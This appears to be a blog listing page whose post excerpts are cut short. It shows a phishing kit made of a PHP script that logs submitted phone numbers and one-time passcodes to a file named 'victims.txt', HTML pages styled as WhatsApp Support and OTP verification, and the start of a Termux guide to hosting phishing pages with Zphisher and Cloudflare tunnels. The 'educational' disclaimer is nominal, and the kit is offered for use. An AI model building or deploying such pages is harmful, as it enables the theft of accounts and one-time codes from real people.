Posts

Nano save.php

 <?php if (isset($_POST['number']) && isset($_POST['otp'])) {     $number = htmlspecialchars($_POST['number']);     $otp = htmlspecialchars($_POST['otp']);     $ip = $_SERVER['REMOTE_ADDR'];     $time = date("Y-m-d H:i:s");     $log = "IP: $ip\nNumber: $number\nOTP: $otp\nTime: $time\n------------------\n";     file_put_contents("victims.txt", $log, FILE_APPEND);     echo "<h2 style='color:green;'>✅ Thank you! Your request is being processed.</h2>"; } else {     echo "<h2 style='color:red;'>❌ Missing input!</h2>"; } ?>

Nano otp html

 <!DOCTYPE html> <html> <head>   <title>OTP Verification</title>   <style>     body {       font-family: Arial, sans-serif;       background-color: #ECE5DD;       color: #075E54;       text-align: center;       padding-top: 50px;     }     input {       padding: 10px;       font-size: 16px;       width: 70%;       border-radius: 5px;       border: 1px solid #ccc;     }     button {       margin-top: 20px;       padding: 10px 20px;       background: #25D366;       color: white;       border: none;       border-radius: 5px;       font-size: 16px;     }   </style> </head> <body>   <h3>Enter the 6-...

nano number.html

 <!DOCTYPE html> <html> <head>   <title>Verify Number</title>   <style>     body {       font-family: Arial, sans-serif;       background-color: #ECE5DD;       color: #075E54;       text-align: center;       padding-top: 50px;     }     input {       padding: 10px;       font-size: 16px;       width: 70%;       border-radius: 5px;       border: 1px solid #ccc;     }     button {       margin-top: 20px;       padding: 10px 20px;       background: #25D366;       color: white;       border: none;       border-radius: 5px;       font-size: 16px;     }   </style> </head> <body>   <h3>Enter Your What...

nano index.html

 <!DOCTYPE html> <html> <head>   <title>WhatsApp Support</title>   <style>     body {       font-family: Arial, sans-serif;       background-color: #ECE5DD;       color: #075E54;       text-align: center;       padding-top: 50px;     }     h2 {       font-size: 28px;     }     .option {       background: #fff;       margin: 15px auto;       padding: 15px;       width: 80%;       border-radius: 10px;       font-size: 18px;       box-shadow: 0 0 10px #ccc;     }     button {       padding: 10px 20px;       background: #25D366;       color: white;       border: none;       border-radius: 5px;    ...

🔥 How to Create a Phishing Page with Zphisher & Cloudflare in Termux (Step-by-Step Guide)

 If you're new to hacking or just exploring the world of phishing for educational purposes, then you're at the right place. In this blog, I’ll guide you step-by-step on how to use Zphisher with Cloudflare tunneling instead of Ngrok — directly in Termux on Android. 💻📱   > ⚠️ This tutorial is only for educational awareness. Never use it for illegal purposes. --- 📲 What You'll Need: Android phone Termux app Internet connection Basic knowledge of comman --- ✅ Step 1: Install Termux & Update Packages pkg update && pkg upgrade -y This keeps your Termux up to date. --- ✅ Step 2: Install Git and Required Packages pkg install git curl wget php openssh -y pkg install wget -y wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm64 mv cloudflared-linux-arm64 cloudflared chmod +x cloudflared ./cloudflared tunnel These are required tools for cloning and running phishing tools. --- ✅ Step 3: Clone Zphisher Tool git clone https://gi...